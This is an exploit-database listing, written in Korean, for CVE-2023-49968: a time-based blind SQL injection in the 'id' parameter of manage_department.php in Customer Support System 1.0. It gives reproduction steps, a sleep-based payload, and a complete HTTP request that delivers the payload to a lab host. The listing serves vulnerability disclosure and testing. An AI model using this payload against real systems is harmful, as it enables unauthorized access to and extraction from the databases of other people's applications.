Sploitus

Exploit for CVE-2023-49968

kitploit Β· 2026-08-31

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-GERALDOALCANTARA-CVE-2023-49968
# CVE-2023-49968

# Customer Support System 1.0 - manage_department.php의 "id" URL λ§€κ°œλ³€μˆ˜λ₯Ό ν†΅ν•œ SQL μΈμ μ…˜ 취약점

**μ„€λͺ…** : Customer Support System 버전 1에 SQL μΈμ μ…˜ 취약점이 μ‘΄μž¬ν•©λ‹ˆλ‹€. μ•…μ˜μ μΈ κ³΅κ²©μžλŠ” λΆ€μ„œλ₯Ό νŽΈμ§‘ν•˜λŠ” λ™μ•ˆ 'id' URL λ§€κ°œλ³€μˆ˜λ₯Ό μ‘°μž‘ν•˜μ—¬ MySQL λ°μ΄ν„°λ² μ΄μŠ€μ—μ„œ SQL λͺ…령을 μ‹€ν–‰ν•  수 μžˆμŠ΅λ‹ˆλ‹€.

**μ·¨μ•½ν•œ μ œν’ˆ 버전** : Customer Support System 1.0  
**CVE μž‘μ„±μž** : Geraldo AlcΓ’ntara  
**λ‚ μ§œ** : 28/11/2023  
**확인 λ‚ μ§œ** : 19/12/2023  
**CVE** : CVE-2023-49968  
**ν…ŒμŠ€νŠΈ ν™˜κ²½** : Windows

### μž¬ν˜„ 단계:

1- μ• ν”Œλ¦¬μΌ€μ΄μ…˜μ— λ‘œκ·ΈμΈν•©λ‹ˆλ‹€.  
2- λΆ€μ„œ νŽΈμ§‘ νŽ˜μ΄μ§€λ‘œ μ΄λ™ν•˜μ—¬ "Action" λ²„νŠΌμ„ ν΄λ¦­ν•˜κ³  "Edit"λ₯Ό μ„ νƒν•©λ‹ˆλ‹€.  
3- 'id' λ§€κ°œλ³€μˆ˜κ°€ μ „λ‹¬λ˜μ–΄ μ•…μ„± νŽ˜μ΄λ‘œλ“œλ₯Ό μ‚½μž…ν•  수 있게 λ©λ‹ˆλ‹€. **νŽ˜μ΄λ‘œλ“œ** : (select*from(select(sleep(5)))a)

### μš”μ²­:

root@kitploit:~
    
    
    GET /customer_support/manage_department.php?id=(select*from(select(sleep(5)))a) HTTP/1.1
    Host: 192.168.68.182
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
    Accept: */*
    Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate, br
    X-Requested-With: XMLHttpRequest
    Connection: close
    Referer: http://192.168.68.182/customer_support/index.php?page=department_list
    Cookie: PHPSESSID=arlocktakq815fq1lpm5fjml9n